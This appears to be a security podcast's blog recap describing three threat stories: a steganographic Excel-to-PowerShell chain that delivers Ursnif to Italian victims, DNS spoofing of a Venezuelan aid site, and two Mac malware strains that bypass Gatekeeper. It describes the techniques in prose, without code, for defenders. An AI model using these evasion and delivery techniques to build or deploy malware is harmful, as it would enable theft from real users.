image of breaking badness
Breaking Badness
Breaking Badness

2. African or European EXEs


Here are a few highlights from each article we discussed:

Hey It’s-a-Me, Malware

In this article, which was featured in Brominum, the attacker uses steganography to extract data from pixels of a Mario image. Below is a breakdown of this particular attack:

  1. A spreadsheet builds a powershell command from individual pixels in a downloaded image of Super Mario Bros.
  2. This tactic was used to download Gozi/Ursnif and potentially other malware as well (only Gozi/Ursnif confirmed).
  3. This attack is targeting people in Italy – if the machine is not located within Italy, the macro is coded to exit Excel immediately (it does this by using the Application.International MS office property, which returns information about the current country/region and international settings).
  4. Next, an email attachment of an Excel document asks you to enable macros, which enables cmd.exe and powershell.
  5. The powershell downloads an image of Super Mario (it’s-a-me) and extracts data from the pixels of that image.
  6. It’s designed to do a final check to ensure the victim is located in Italy, and if so, it downloads a malicious executable, which is the Ursnif malware.

Ursnif is an info stealer and has capabilities including:

  • Capture screenshots
  • Steal cookies
  • Clear Cookies
  • Steal certificates
  • Reboot machine
  • Start a SOCK proxy
  • Upload a log file that contains user information
  • Get a list of active running processes
  • Terminate process
  • Download and install a new executable

DNS Manipulation in Venezuela

SecureList detailed a manipulation of DNS in Venezuela. In this case, a website was set up for people to register to aid in the humanitarian crisis in Venezuela.

  1. A separate site was created 5 days later with a similar domain name, which spoofed the legitimate site’s domain name.
  2. Within Venezuela, these two sites are both directed to the same IP, which is the IP of the nefarious domain.
  3. Outside of Venezuela, however, they are sent to two different IPs
    The DNS manipulation is only occurring within Venezuela (therefore, we know it is not site registration manipulation).

Technically how this might work:

  • If you alter the IP address that the legit site points to in those in-country servers to the bad domain’s IP address.
  • You’d have to have access to those DNS servers either by means of hacking in or having legitimate access.

African or European EXEs (Shlayer and Mac Windows .EXE Malware)

This week, two new variants of Mac malware were discovered, both of which bypass the Mac gatekeeper to infect Mac devices. The Mac gatekeeper is similar to the infamous Bridgekeeper from Monty Python and the Holy Grail, in that it stands guard to prevent unauthorized access. And like the Bridgekeeper, it turns out the Mac Gatekeeper was a little easier to defeat than it initially seemed.

In an article featured in Carbon Black’s blog, a new variant of Shlayer, which was first seen in the wild in Feb 2018, can now escalate privileges using an older technique to disable the Gatekeeper function that prevents unsigned code from being run. Here’s how it works:

  1. This attack is disguised as an Adobe Flash software update through a combination of fake popups on hijacked domains or legitimate site clones, or in malvertising campaigns. It affects versions of macOS from 10.10.5 to 10.14.3.
  2. Many of the initial DMGs are signed with a legitimate Apple developer ID and use legitimate system applications via bash to conduct all installation activity.
  3. It then collects system information such as the macOS version and IOPlatformUUID (a unique identifier for the system) and generates a “Session GUID” using uuidgen.
  4. Next, it creates a custom URL using the information generated in the previous step and downloads the second stage payload. For example:
    1. After the second stage payload is downloaded and executed, it attempts to escalate privileges with sudo using a technique invoking /usr/libexec/security_authtrampoline.
    2. Once the malware has elevated to root privileges, it attempts to download additional software (observed to be adware in the analyzed samples) and disables Gatekeeper for the downloaded software using spctl. This allows the allowlisted software to run without user intervention even if the system is set to disallow unknown applications downloaded from the internet.

In the second Mac malware story we covered in Trend Micro’s blog, a malicious Windows EXE can infect Mac computers. It’s curious as EXE is normally a windows-only file format and will return an error if attempted to run on a Mac or Linux system. See further information on this malware below:

    1. This particular EXE bypasses the Mac Gatekeeper (which prevents EXEs from running), whose routine evades Gatekeeper because EXE is not checked by this software. This leads to bypassing the code signature check and verification since the technology only checks native Mac files.
    2. Next, a popular firewall app for Mac and Windows called “Little Snitch” is installed. This contains a DMG file for hosting the Little Snitch installer.

The malicious EXE is buried in the installer contents.

  • When the installer is executed, the main file also launched the executable as it is enabled by the mono framework included in the bundle. This framework allows the execution of Microsoft .NET applications across platforms such as OSX.
  • This particular malware collects system information, including:
    • ModelName
    • ModelIdentifier
    • ProcessorSpeed
    • ProcessorDetails
    • NumberofProcessors
    • NumberofCores
    • Memory
    • BootROMVersion
    • SMCVersion
    • SerialNumber
    • UUID

It also scans for certain apps from a predetermined list (such as QuickTime, iTunes, etc), and sends all the info back to the C2 server. If this malware is run on a windows machine, it returns an error.


This Week’s Hoodie Scale

Hey It’s-a-Me, Malware

[Tim]: 4/10 Hoodies
[Emily]: 5/10 Hoodies

DNS Manipulation in Venezuela

[Tim]: 7/10 Hoodies
[Emily]: 7/10 Hoodies

African or European EXEs

[Tim]: 4/10 Hoodies
[Emily]: 4/10 Hoodies

That’s about all we have for this week, you can find us on Twitter @domaintools, all of the articles mentioned in our podcast will always be included in our blog. Catch us next Wednesday at 9 AM Pacific time when we publish our next podcast and blog.

*A special thanks to John Roderick for our incredible podcast music!